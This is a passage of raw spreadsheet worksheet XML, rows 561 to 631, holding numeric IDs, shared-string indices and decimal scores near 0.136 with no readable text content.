      </c>
      <c r="E561" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F561" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="562" ht="15.75" customHeight="1">
      <c r="A562" s="1">
        <v>30714.0</v>
      </c>
      <c r="B562" s="2">
        <v>4.3144062E7</v>
      </c>
      <c r="C562" s="2" t="s">
        <v>496</v>
      </c>
      <c r="D562" s="2">
        <v>1.0</v>
      </c>
      <c r="E562" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F562" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="563" ht="15.75" customHeight="1">
      <c r="A563" s="1">
        <v>31685.0</v>
      </c>
      <c r="B563" s="2">
        <v>5190985.0</v>
      </c>
      <c r="C563" s="2" t="s">
        <v>487</v>
      </c>
      <c r="D563" s="2">
        <v>1.0</v>
      </c>
      <c r="E563" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F563" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="564" ht="15.75" customHeight="1">
      <c r="A564" s="1">
        <v>23394.0</v>
      </c>
      <c r="B564" s="2">
        <v>5575598.0</v>
      </c>
      <c r="C564" s="2" t="s">
        <v>497</v>
      </c>
      <c r="D564" s="2">
        <v>1.0</v>
      </c>
      <c r="E564" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F564" s="2">
        <v>0.1380718954248366</v>
      </c>
    </row>
    <row r="565" ht="15.75" customHeight="1">
      <c r="A565" s="1">
        <v>25983.0</v>
      </c>
      <c r="B565" s="2">
        <v>1.5323777E7</v>
      </c>
      <c r="C565" s="2" t="s">
        <v>498</v>
      </c>
      <c r="D565" s="2">
        <v>1.0</v>
      </c>
      <c r="E565" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F565" s="2">
        <v>0.1380208333333334</v>
      </c>
    </row>
    <row r="566" ht="15.75" customHeight="1">
      <c r="A566" s="1">
        <v>28708.0</v>
      </c>
      <c r="B566" s="2">
        <v>2.7767387E7</v>
      </c>
      <c r="C566" s="2" t="s">
        <v>499</v>
      </c>
      <c r="D566" s="2">
        <v>1.0</v>
      </c>
      <c r="E566" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F566" s="2">
        <v>0.1380208333333334</v>
      </c>
    </row>
    <row r="567" ht="15.75" customHeight="1">
      <c r="A567" s="1">
        <v>21885.0</v>
      </c>
      <c r="B567" s="2">
        <v>2.7756354E7</v>
      </c>
      <c r="C567" s="2" t="s">
        <v>445</v>
      </c>
      <c r="D567" s="2">
        <v>1.0</v>
      </c>
      <c r="E567" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F567" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="568" ht="15.75" customHeight="1">
      <c r="A568" s="1">
        <v>26244.0</v>
      </c>
      <c r="B568" s="2">
        <v>1.6309622E7</v>
      </c>
      <c r="C568" s="2" t="s">
        <v>500</v>
      </c>
      <c r="D568" s="2">
        <v>1.0</v>
      </c>
      <c r="E568" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F568" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="569" ht="15.75" customHeight="1">
      <c r="A569" s="1">
        <v>27881.0</v>
      </c>
      <c r="B569" s="2">
        <v>2.3568511E7</v>
      </c>
      <c r="C569" s="2" t="s">
        <v>366</v>
      </c>
      <c r="D569" s="2">
        <v>1.0</v>
      </c>
      <c r="E569" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F569" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="570" ht="15.75" customHeight="1">
      <c r="A570" s="1">
        <v>31404.0</v>
      </c>
      <c r="B570" s="2">
        <v>5.0028042E7</v>
      </c>
      <c r="C570" s="2" t="s">
        <v>501</v>
      </c>
      <c r="D570" s="2">
        <v>1.0</v>
      </c>
      <c r="E570" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F570" s="2">
        <v>0.1378968253968254</v>
      </c>
    </row>
    <row r="571" ht="15.75" customHeight="1">
      <c r="A571" s="1">
        <v>28397.0</v>
      </c>
      <c r="B571" s="2">
        <v>2.626623E7</v>
      </c>
      <c r="C571" s="2" t="s">
        <v>502</v>
      </c>
      <c r="D571" s="2">
        <v>1.0</v>
      </c>
      <c r="E571" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F571" s="2">
        <v>0.1376811594202899</v>
      </c>
    </row>
    <row r="572" ht="15.75" customHeight="1">
      <c r="A572" s="1">
        <v>10257.0</v>
      </c>
      <c r="B572" s="2">
        <v>5.7554924E7</v>
      </c>
      <c r="C572" s="2" t="s">
        <v>503</v>
      </c>
      <c r="D572" s="2">
        <v>1.0</v>
      </c>
      <c r="E572" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F572" s="2">
        <v>0.1375227686703097</v>
      </c>
    </row>
    <row r="573" ht="15.75" customHeight="1">
      <c r="A573" s="1">
        <v>29524.0</v>
      </c>
      <c r="B573" s="2">
        <v>3.2780614E7</v>
      </c>
      <c r="C573" s="2" t="s">
        <v>504</v>
      </c>
      <c r="D573" s="2">
        <v>1.0</v>
      </c>
      <c r="E573" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F573" s="2">
        <v>0.1374269005847954</v>
      </c>
    </row>
    <row r="574" ht="15.75" customHeight="1">
      <c r="A574" s="1">
        <v>22885.0</v>
      </c>
      <c r="B574" s="2">
        <v>4.7777075E7</v>
      </c>
      <c r="C574" s="2" t="s">
        <v>505</v>
      </c>
      <c r="D574" s="2">
        <v>1.0</v>
      </c>
      <c r="E574" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F574" s="2">
        <v>0.1374269005847953</v>
      </c>
    </row>
    <row r="575" ht="15.75" customHeight="1">
      <c r="A575" s="1">
        <v>31466.0</v>
      </c>
      <c r="B575" s="2">
        <v>5044188.0</v>
      </c>
      <c r="C575" s="2" t="s">
        <v>462</v>
      </c>
      <c r="D575" s="2">
        <v>1.0</v>
      </c>
      <c r="E575" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F575" s="2">
        <v>0.1372053872053872</v>
      </c>
    </row>
    <row r="576" ht="15.75" customHeight="1">
      <c r="A576" s="1">
        <v>20366.0</v>
      </c>
      <c r="B576" s="2">
        <v>1.1784319E7</v>
      </c>
      <c r="C576" s="2" t="s">
        <v>506</v>
      </c>
      <c r="D576" s="2">
        <v>1.0</v>
      </c>
      <c r="E576" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F576" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="577" ht="15.75" customHeight="1">
      <c r="A577" s="1">
        <v>24738.0</v>
      </c>
      <c r="B577" s="2">
        <v>1.1784318E7</v>
      </c>
      <c r="C577" s="2" t="s">
        <v>506</v>
      </c>
      <c r="D577" s="2">
        <v>1.0</v>
      </c>
      <c r="E577" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F577" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="578" ht="15.75" customHeight="1">
      <c r="A578" s="1">
        <v>25250.0</v>
      </c>
      <c r="B578" s="2">
        <v>1.3382562E7</v>
      </c>
      <c r="C578" s="2" t="s">
        <v>460</v>
      </c>
      <c r="D578" s="2">
        <v>1.0</v>
      </c>
      <c r="E578" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F578" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="579" ht="15.75" customHeight="1">
      <c r="A579" s="1">
        <v>22393.0</v>
      </c>
      <c r="B579" s="2">
        <v>3.5394705E7</v>
      </c>
      <c r="C579" s="2" t="s">
        <v>507</v>
      </c>
      <c r="D579" s="2">
        <v>1.0</v>
      </c>
      <c r="E579" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F579" s="2">
        <v>0.1369731800766283</v>
      </c>
    </row>
    <row r="580" ht="15.75" customHeight="1">
      <c r="A580" s="1">
        <v>31365.0</v>
      </c>
      <c r="B580" s="2">
        <v>4993578.0</v>
      </c>
      <c r="C580" s="2" t="s">
        <v>508</v>
      </c>
      <c r="D580" s="2">
        <v>1.0</v>
      </c>
      <c r="E580" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F580" s="2">
        <v>0.13681592039801</v>
      </c>
    </row>
    <row r="581" ht="15.75" customHeight="1">
      <c r="A581" s="1">
        <v>31417.0</v>
      </c>
      <c r="B581" s="2">
        <v>5.0100331E7</v>
      </c>
      <c r="C581" s="2" t="s">
        <v>509</v>
      </c>
      <c r="D581" s="2">
        <v>1.0</v>
      </c>
      <c r="E581" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F581" s="2">
        <v>0.13681592039801</v>
      </c>
    </row>
    <row r="582" ht="15.75" customHeight="1">
      <c r="A582" s="1">
        <v>24445.0</v>
      </c>
      <c r="B582" s="2">
        <v>1.0906023E7</v>
      </c>
      <c r="C582" s="2" t="s">
        <v>510</v>
      </c>
      <c r="D582" s="2">
        <v>1.0</v>
      </c>
      <c r="E582" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F582" s="2">
        <v>0.1366959064327486</v>
      </c>
    </row>
    <row r="583" ht="15.75" customHeight="1">
      <c r="A583" s="1">
        <v>10125.0</v>
      </c>
      <c r="B583" s="2">
        <v>5.7278991E7</v>
      </c>
      <c r="C583" s="2" t="s">
        <v>511</v>
      </c>
      <c r="D583" s="2">
        <v>1.0</v>
      </c>
      <c r="E583" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F583" s="2">
        <v>0.1365348399246705</v>
      </c>
    </row>
    <row r="584" ht="15.75" customHeight="1">
      <c r="A584" s="1">
        <v>22568.0</v>
      </c>
      <c r="B584" s="2">
        <v>3.8526532E7</v>
      </c>
      <c r="C584" s="2" t="s">
        <v>512</v>
      </c>
      <c r="D584" s="2">
        <v>1.0</v>
      </c>
      <c r="E584" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F584" s="2">
        <v>0.1365348399246705</v>
      </c>
    </row>
    <row r="585" ht="15.75" customHeight="1">
      <c r="A585" s="1">
        <v>30558.0</v>
      </c>
      <c r="B585" s="2">
        <v>4.0772431E7</v>
      </c>
      <c r="C585" s="2" t="s">
        <v>513</v>
      </c>
      <c r="D585" s="2">
        <v>1.0</v>
      </c>
      <c r="E585" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F585" s="2">
        <v>0.1365348399246705</v>
      </c>
    </row>
    <row r="586" ht="15.75" customHeight="1">
      <c r="A586" s="1">
        <v>31342.0</v>
      </c>
      <c r="B586" s="2">
        <v>4.9807413E7</v>
      </c>
      <c r="C586" s="2" t="s">
        <v>514</v>
      </c>
      <c r="D586" s="2">
        <v>1.0</v>
      </c>
      <c r="E586" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F586" s="2">
        <v>0.1365348399246705</v>
      </c>
    </row>
    <row r="587" ht="15.75" customHeight="1">
      <c r="A587" s="1">
        <v>11173.0</v>
      </c>
      <c r="B587" s="2">
        <v>1.968193E7</v>
      </c>
      <c r="C587" s="2" t="s">
        <v>515</v>
      </c>
      <c r="D587" s="2">
        <v>1.0</v>
      </c>
      <c r="E587" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F587" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="588" ht="15.75" customHeight="1">
      <c r="A588" s="1">
        <v>20217.0</v>
      </c>
      <c r="B588" s="2">
        <v>1.0739807E7</v>
      </c>
      <c r="C588" s="2" t="s">
        <v>516</v>
      </c>
      <c r="D588" s="2">
        <v>1.0</v>
      </c>
      <c r="E588" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F588" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="589" ht="15.75" customHeight="1">
      <c r="A589" s="1">
        <v>29546.0</v>
      </c>
      <c r="B589" s="2">
        <v>3.3039438E7</v>
      </c>
      <c r="C589" s="2" t="s">
        <v>517</v>
      </c>
      <c r="D589" s="2">
        <v>1.0</v>
      </c>
      <c r="E589" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F589" s="2">
        <v>0.1362847222222223</v>
      </c>
    </row>
    <row r="590" ht="15.75" customHeight="1">
      <c r="A590" s="1">
        <v>24282.0</v>
      </c>
      <c r="B590" s="2">
        <v>1.0545918E7</v>
      </c>
      <c r="C590" s="2" t="s">
        <v>518</v>
      </c>
      <c r="D590" s="2">
        <v>1.0</v>
      </c>
      <c r="E590" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F590" s="2">
        <v>0.1362847222222222</v>
      </c>
    </row>
    <row r="591" ht="15.75" customHeight="1">
      <c r="A591" s="1">
        <v>21801.0</v>
      </c>
      <c r="B591" s="2">
        <v>2.6686221E7</v>
      </c>
      <c r="C591" s="2" t="s">
        <v>519</v>
      </c>
      <c r="D591" s="2">
        <v>1.0</v>
      </c>
      <c r="E591" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F591" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="592" ht="15.75" customHeight="1">
      <c r="A592" s="1">
        <v>22842.0</v>
      </c>
      <c r="B592" s="2">
        <v>4.6643363E7</v>
      </c>
      <c r="C592" s="2" t="s">
        <v>520</v>
      </c>
      <c r="D592" s="2">
        <v>1.0</v>
      </c>
      <c r="E592" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F592" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="593" ht="15.75" customHeight="1">
      <c r="A593" s="1">
        <v>23492.0</v>
      </c>
      <c r="B593" s="2">
        <v>5752169.0</v>
      </c>
      <c r="C593" s="2" t="s">
        <v>521</v>
      </c>
      <c r="D593" s="2">
        <v>1.0</v>
      </c>
      <c r="E593" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F593" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="594" ht="15.75" customHeight="1">
      <c r="A594" s="1">
        <v>32142.0</v>
      </c>
      <c r="B594" s="2">
        <v>5.4216631E7</v>
      </c>
      <c r="C594" s="2" t="s">
        <v>522</v>
      </c>
      <c r="D594" s="2">
        <v>1.0</v>
      </c>
      <c r="E594" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F594" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="595" ht="15.75" customHeight="1">
      <c r="A595" s="1">
        <v>32551.0</v>
      </c>
      <c r="B595" s="2">
        <v>5752168.0</v>
      </c>
      <c r="C595" s="2" t="s">
        <v>521</v>
      </c>
      <c r="D595" s="2">
        <v>1.0</v>
      </c>
      <c r="E595" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F595" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="596" ht="15.75" customHeight="1">
      <c r="A596" s="1">
        <v>32921.0</v>
      </c>
      <c r="B596" s="2">
        <v>6423393.0</v>
      </c>
      <c r="C596" s="2" t="s">
        <v>523</v>
      </c>
      <c r="D596" s="2">
        <v>1.0</v>
      </c>
      <c r="E596" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F596" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="597" ht="15.75" customHeight="1">
      <c r="A597" s="1">
        <v>15082.0</v>
      </c>
      <c r="B597" s="2">
        <v>4.1754764E7</v>
      </c>
      <c r="C597" s="2" t="s">
        <v>524</v>
      </c>
      <c r="D597" s="2">
        <v>1.0</v>
      </c>
      <c r="E597" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F597" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="598" ht="15.75" customHeight="1">
      <c r="A598" s="1">
        <v>18226.0</v>
      </c>
      <c r="B598" s="2">
        <v>5.2106152E7</v>
      </c>
      <c r="C598" s="2" t="s">
        <v>525</v>
      </c>
      <c r="D598" s="2">
        <v>1.0</v>
      </c>
      <c r="E598" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F598" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="599" ht="15.75" customHeight="1">
      <c r="A599" s="1">
        <v>20898.0</v>
      </c>
      <c r="B599" s="2">
        <v>1.6232893E7</v>
      </c>
      <c r="C599" s="2" t="s">
        <v>526</v>
      </c>
      <c r="D599" s="2">
        <v>1.0</v>
      </c>
      <c r="E599" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F599" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="600" ht="15.75" customHeight="1">
      <c r="A600" s="1">
        <v>21651.0</v>
      </c>
      <c r="B600" s="2">
        <v>2.4899339E7</v>
      </c>
      <c r="C600" s="2" t="s">
        <v>527</v>
      </c>
      <c r="D600" s="2">
        <v>1.0</v>
      </c>
      <c r="E600" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F600" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="601" ht="15.75" customHeight="1">
      <c r="A601" s="1">
        <v>22070.0</v>
      </c>
      <c r="B601" s="2">
        <v>3.0589323E7</v>
      </c>
      <c r="C601" s="2" t="s">
        <v>528</v>
      </c>
      <c r="D601" s="2">
        <v>1.0</v>
      </c>
      <c r="E601" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F601" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="602" ht="15.75" customHeight="1">
      <c r="A602" s="1">
        <v>23421.0</v>
      </c>
      <c r="B602" s="2">
        <v>5.6307593E7</v>
      </c>
      <c r="C602" s="2" t="s">
        <v>529</v>
      </c>
      <c r="D602" s="2">
        <v>1.0</v>
      </c>
      <c r="E602" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F602" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="603" ht="15.75" customHeight="1">
      <c r="A603" s="1">
        <v>24180.0</v>
      </c>
      <c r="B603" s="2">
        <v>1.0239587E7</v>
      </c>
      <c r="C603" s="2" t="s">
        <v>530</v>
      </c>
      <c r="D603" s="2">
        <v>1.0</v>
      </c>
      <c r="E603" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F603" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="604" ht="15.75" customHeight="1">
      <c r="A604" s="1">
        <v>26196.0</v>
      </c>
      <c r="B604" s="2">
        <v>1.6232892E7</v>
      </c>
      <c r="C604" s="2" t="s">
        <v>526</v>
      </c>
      <c r="D604" s="2">
        <v>1.0</v>
      </c>
      <c r="E604" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F604" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="605" ht="15.75" customHeight="1">
      <c r="A605" s="1">
        <v>28157.0</v>
      </c>
      <c r="B605" s="2">
        <v>2.4899338E7</v>
      </c>
      <c r="C605" s="2" t="s">
        <v>527</v>
      </c>
      <c r="D605" s="2">
        <v>1.0</v>
      </c>
      <c r="E605" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F605" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="606" ht="15.75" customHeight="1">
      <c r="A606" s="1">
        <v>30860.0</v>
      </c>
      <c r="B606" s="2">
        <v>4.6177438E7</v>
      </c>
      <c r="C606" s="2" t="s">
        <v>531</v>
      </c>
      <c r="D606" s="2">
        <v>1.0</v>
      </c>
      <c r="E606" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F606" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="607" ht="15.75" customHeight="1">
      <c r="A607" s="1">
        <v>32198.0</v>
      </c>
      <c r="B607" s="2">
        <v>5476964.0</v>
      </c>
      <c r="C607" s="2" t="s">
        <v>532</v>
      </c>
      <c r="D607" s="2">
        <v>1.0</v>
      </c>
      <c r="E607" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F607" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="608" ht="15.75" customHeight="1">
      <c r="A608" s="1">
        <v>32404.0</v>
      </c>
      <c r="B608" s="2">
        <v>5.6307592E7</v>
      </c>
      <c r="C608" s="2" t="s">
        <v>529</v>
      </c>
      <c r="D608" s="2">
        <v>1.0</v>
      </c>
      <c r="E608" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F608" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="609" ht="15.75" customHeight="1">
      <c r="A609" s="1">
        <v>32724.0</v>
      </c>
      <c r="B609" s="2">
        <v>5987996.0</v>
      </c>
      <c r="C609" s="2" t="s">
        <v>533</v>
      </c>
      <c r="D609" s="2">
        <v>1.0</v>
      </c>
      <c r="E609" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F609" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="610" ht="15.75" customHeight="1">
      <c r="A610" s="1">
        <v>33605.0</v>
      </c>
      <c r="B610" s="2">
        <v>8341125.0</v>
      </c>
      <c r="C610" s="2" t="s">
        <v>534</v>
      </c>
      <c r="D610" s="2">
        <v>1.0</v>
      </c>
      <c r="E610" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F610" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="611" ht="15.75" customHeight="1">
      <c r="A611" s="1">
        <v>33839.0</v>
      </c>
      <c r="B611" s="2">
        <v>9006360.0</v>
      </c>
      <c r="C611" s="2" t="s">
        <v>535</v>
      </c>
      <c r="D611" s="2">
        <v>1.0</v>
      </c>
      <c r="E611" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F611" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="612" ht="15.75" customHeight="1">
      <c r="A612" s="1">
        <v>32781.0</v>
      </c>
      <c r="B612" s="2">
        <v>6119883.0</v>
      </c>
      <c r="C612" s="2" t="s">
        <v>536</v>
      </c>
      <c r="D612" s="2">
        <v>1.0</v>
      </c>
      <c r="E612" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F612" s="2">
        <v>0.1359126984126985</v>
      </c>
    </row>
    <row r="613" ht="15.75" customHeight="1">
      <c r="A613" s="1">
        <v>25500.0</v>
      </c>
      <c r="B613" s="2">
        <v>1.411972E7</v>
      </c>
      <c r="C613" s="2" t="s">
        <v>537</v>
      </c>
      <c r="D613" s="2">
        <v>1.0</v>
      </c>
      <c r="E613" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F613" s="2">
        <v>0.1359126984126984</v>
      </c>
    </row>
    <row r="614" ht="15.75" customHeight="1">
      <c r="A614" s="1">
        <v>33609.0</v>
      </c>
      <c r="B614" s="2">
        <v>8342153.0</v>
      </c>
      <c r="C614" s="2" t="s">
        <v>538</v>
      </c>
      <c r="D614" s="2">
        <v>1.0</v>
      </c>
      <c r="E614" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F614" s="2">
        <v>0.1359126984126984</v>
      </c>
    </row>
    <row r="615" ht="15.75" customHeight="1">
      <c r="A615" s="1">
        <v>24744.0</v>
      </c>
      <c r="B615" s="2">
        <v>1.1804199E7</v>
      </c>
      <c r="C615" s="2" t="s">
        <v>539</v>
      </c>
      <c r="D615" s="2">
        <v>1.0</v>
      </c>
      <c r="E615" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F615" s="2">
        <v>0.1357012750455374</v>
      </c>
    </row>
    <row r="616" ht="15.75" customHeight="1">
      <c r="A616" s="1">
        <v>7535.0</v>
      </c>
      <c r="B616" s="2">
        <v>5.1470923E7</v>
      </c>
      <c r="C616" s="2" t="s">
        <v>540</v>
      </c>
      <c r="D616" s="2">
        <v>1.0</v>
      </c>
      <c r="E616" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F616" s="2">
        <v>0.135477582846004</v>
      </c>
    </row>
    <row r="617" ht="15.75" customHeight="1">
      <c r="A617" s="1">
        <v>20125.0</v>
      </c>
      <c r="B617" s="2">
        <v>1.0047681E7</v>
      </c>
      <c r="C617" s="2" t="s">
        <v>541</v>
      </c>
      <c r="D617" s="2">
        <v>1.0</v>
      </c>
      <c r="E617" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F617" s="2">
        <v>0.1354775828460039</v>
      </c>
    </row>
    <row r="618" ht="15.75" customHeight="1">
      <c r="A618" s="1">
        <v>20766.0</v>
      </c>
      <c r="B618" s="2">
        <v>1.4958626E7</v>
      </c>
      <c r="C618" s="2" t="s">
        <v>542</v>
      </c>
      <c r="D618" s="2">
        <v>1.0</v>
      </c>
      <c r="E618" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F618" s="2">
        <v>0.1354775828460039</v>
      </c>
    </row>
    <row r="619" ht="15.75" customHeight="1">
      <c r="A619" s="1">
        <v>24131.0</v>
      </c>
      <c r="B619" s="2">
        <v>1.0045478E7</v>
      </c>
      <c r="C619" s="2" t="s">
        <v>543</v>
      </c>
      <c r="D619" s="2">
        <v>1.0</v>
      </c>
      <c r="E619" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F619" s="2">
        <v>0.1353046594982079</v>
      </c>
    </row>
    <row r="620" ht="15.75" customHeight="1">
      <c r="A620" s="1">
        <v>32159.0</v>
      </c>
      <c r="B620" s="2">
        <v>5.4345888E7</v>
      </c>
      <c r="C620" s="2" t="s">
        <v>544</v>
      </c>
      <c r="D620" s="2">
        <v>1.0</v>
      </c>
      <c r="E620" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F620" s="2">
        <v>0.1353046594982079</v>
      </c>
    </row>
    <row r="621" ht="15.75" customHeight="1">
      <c r="A621" s="1">
        <v>21071.0</v>
      </c>
      <c r="B621" s="2">
        <v>1.7890348E7</v>
      </c>
      <c r="C621" s="2" t="s">
        <v>545</v>
      </c>
      <c r="D621" s="2">
        <v>1.0</v>
      </c>
      <c r="E621" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F621" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="622" ht="15.75" customHeight="1">
      <c r="A622" s="1">
        <v>22381.0</v>
      </c>
      <c r="B622" s="2">
        <v>3.517423E7</v>
      </c>
      <c r="C622" s="2" t="s">
        <v>546</v>
      </c>
      <c r="D622" s="2">
        <v>1.0</v>
      </c>
      <c r="E622" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F622" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="623" ht="15.75" customHeight="1">
      <c r="A623" s="1">
        <v>22996.0</v>
      </c>
      <c r="B623" s="2">
        <v>4.957168E7</v>
      </c>
      <c r="C623" s="2" t="s">
        <v>547</v>
      </c>
      <c r="D623" s="2">
        <v>1.0</v>
      </c>
      <c r="E623" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F623" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="624" ht="15.75" customHeight="1">
      <c r="A624" s="1">
        <v>23950.0</v>
      </c>
      <c r="B624" s="2">
        <v>8905631.0</v>
      </c>
      <c r="C624" s="2" t="s">
        <v>548</v>
      </c>
      <c r="D624" s="2">
        <v>1.0</v>
      </c>
      <c r="E624" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F624" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="625" ht="15.75" customHeight="1">
      <c r="A625" s="1">
        <v>29151.0</v>
      </c>
      <c r="B625" s="2">
        <v>3.0589322E7</v>
      </c>
      <c r="C625" s="2" t="s">
        <v>549</v>
      </c>
      <c r="D625" s="2">
        <v>1.0</v>
      </c>
      <c r="E625" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F625" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="626" ht="15.75" customHeight="1">
      <c r="A626" s="1">
        <v>29536.0</v>
      </c>
      <c r="B626" s="2">
        <v>3.283781E7</v>
      </c>
      <c r="C626" s="2" t="s">
        <v>550</v>
      </c>
      <c r="D626" s="2">
        <v>1.0</v>
      </c>
      <c r="E626" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F626" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="627" ht="15.75" customHeight="1">
      <c r="A627" s="1">
        <v>31278.0</v>
      </c>
      <c r="B627" s="2">
        <v>4.9571679E7</v>
      </c>
      <c r="C627" s="2" t="s">
        <v>547</v>
      </c>
      <c r="D627" s="2">
        <v>1.0</v>
      </c>
      <c r="E627" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F627" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="628" ht="15.75" customHeight="1">
      <c r="A628" s="1">
        <v>24562.0</v>
      </c>
      <c r="B628" s="2">
        <v>1.1301177E7</v>
      </c>
      <c r="C628" s="2" t="s">
        <v>551</v>
      </c>
      <c r="D628" s="2">
        <v>1.0</v>
      </c>
      <c r="E628" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F628" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="629" ht="15.75" customHeight="1">
      <c r="A629" s="1">
        <v>24970.0</v>
      </c>
      <c r="B629" s="2">
        <v>1.2624401E7</v>
      </c>
      <c r="C629" s="2" t="s">
        <v>552</v>
      </c>
      <c r="D629" s="2">
        <v>1.0</v>
      </c>
      <c r="E629" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F629" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="630" ht="15.75" customHeight="1">
      <c r="A630" s="1">
        <v>27339.0</v>
      </c>
      <c r="B630" s="2">
        <v>2.1456103E7</v>
      </c>
      <c r="C630" s="2" t="s">
        <v>553</v>
      </c>
      <c r="D630" s="2">
        <v>1.0</v>
      </c>
      <c r="E630" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F630" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="631" ht="15.75" customHeight="1">
      <c r="A631" s="1">
        <v>30195.0</v>
      </c>
      <c r="B631" s="2">
        <v>3.7232715E7</v>
      </c>
      <c r="C631" s="2" t="s">
        <v>554</v>
      </c>
      <c r="D631" s="2">
